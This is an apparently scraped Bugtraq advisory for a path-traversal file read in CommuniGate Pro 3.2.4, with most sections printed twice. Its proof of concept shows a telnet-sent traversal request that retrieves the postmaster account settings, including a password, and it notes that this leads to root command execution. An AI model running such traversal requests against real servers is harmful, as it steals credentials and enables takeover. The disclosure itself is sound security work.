CommuniGate Pro Arbitrary File Read Vulnerability
BID:1493
Info
CommuniGate Pro Arbitrary File Read Vulnerability
| Bugtraq ID: | 1493 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 03 2000 12:00AM |
| Updated: | Apr 03 2000 12:00AM |
| Credit: | This vulnerability was documented in a S21Sec Advisory on April 3, 2000. |
| Vulnerable: |
Stalker Communigate Pro 3.2.4 |
| Not Vulnerable: |
Stalker Communigate Pro 3.3 b2 Stalker Communigate Pro 3.3 b1 |
Discussion
CommuniGate Pro Arbitrary File Read Vulnerability
A vulnerability exists in the CommuniGate Pro product, from Stalker. It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root.
A vulnerability exists in the CommuniGate Pro product, from Stalker. It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root.
Exploit / POC
CommuniGate Pro Arbitrary File Read Vulnerability
Retrieve the postmaster/manager configuration file:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0
HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT
{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$
Using this information, it is possible to alter the configuration on the mail server to allow execution using its PIPE feature.
Retrieve the postmaster/manager configuration file:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0
HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT
{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$
Using this information, it is possible to alter the configuration on the mail server to allow execution using its PIPE feature.
Solution / Fix
CommuniGate Pro Arbitrary File Read Vulnerability
Solution:
This vulnerability is fixed in Version 3.3 betas, and should be fixed in the release version of 3.3 when it is available.
Stalker Communigate Pro 3.2.4
Solution:
This vulnerability is fixed in Version 3.3 betas, and should be fixed in the release version of 3.3 when it is available.
Stalker Communigate Pro 3.2.4
-
Stalker CommuniGate Pro
http://www.stalker.com
References
CommuniGate Pro Arbitrary File Read Vulnerability
References:
References: